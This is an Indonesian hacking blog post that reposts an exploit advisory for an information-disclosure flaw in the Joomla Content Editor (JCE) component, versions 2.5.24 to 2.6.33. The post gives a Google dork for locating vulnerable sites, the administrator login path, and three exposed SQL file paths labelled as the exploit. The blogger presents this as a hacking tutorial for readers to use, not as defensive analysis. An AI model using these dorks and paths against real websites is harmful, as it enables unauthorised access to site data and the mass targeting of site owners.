Saya Kali Ini Akan Membahas Tentang Exploiter
Yaitu Exploiter Joomla Nah Langsung Aja Tanpa Basa Basi Gan
#################################################################################################
# Exploit Title : Joomla Content Editor Com_JCE Components 2.5.24 Database Backup Disclosure Information Vulnerability
# Author [ Discovered By ] :KingSkrupellos
# Date : 02/12/2018
# Vendor Homepage : joomlacontenteditor.net
# Software Download Links : joomlacontenteditor.net/downloads/
+ github.com/joomla/volunteers.joomla.org/tree/master/www/administrator/components/com_jce/sql
+ gitlab.dev.playkey.net/realzkh/realzkh_legacy/tree/master/administrator/components/com_jce/sql
+ JCE 2.6.33 => joomlacontenteditor.net/downloads/editor/core?task=callelement&format=raw&item_id=1353&element=
f85c494b-2b32-4109-b8c1-083cca2b7db6&method=download&args[0]=9ee3309d5768681d0360490d647c2266
+ JCE 2.5.24 => joomlacontenteditor.net/news/jce-2524-released
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 2.6.33 ~ 2.5.24
# Google Dorks : inurl:''/index.php?option=com_jce''
Index of /administrator/components/com_jce/sql/
# Exploit Risk : Medium
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
# Admin Panel Login Path :
/administrator/
# Exploit :
/administrator/components/com_jce/sql/mysql.sql
/administrator/components/com_jce/sql/postgresql.sql
/administrator/components/com_jce/sql/sqlsrv.sql
#################################################################################################
Ok Sekian Dan Terima Kasih Udah Kunjungi Blog Saya Akan Update 2 Hari Sekali Tentang Tutor Tutor Seputar Dunia Hacking Dan Pemrograman
See You Again Pembaca Setia GXTFORTEX Blog
Saya Tn.GXTFORTEX mengucapkan Terima Kasih Sekali lagi
OFFICIAL Team KubuCy Team
This comment has been removed by the author.
ReplyDeleteThis comment has been removed by the author.
ReplyDeleteHy tayo
ReplyDelete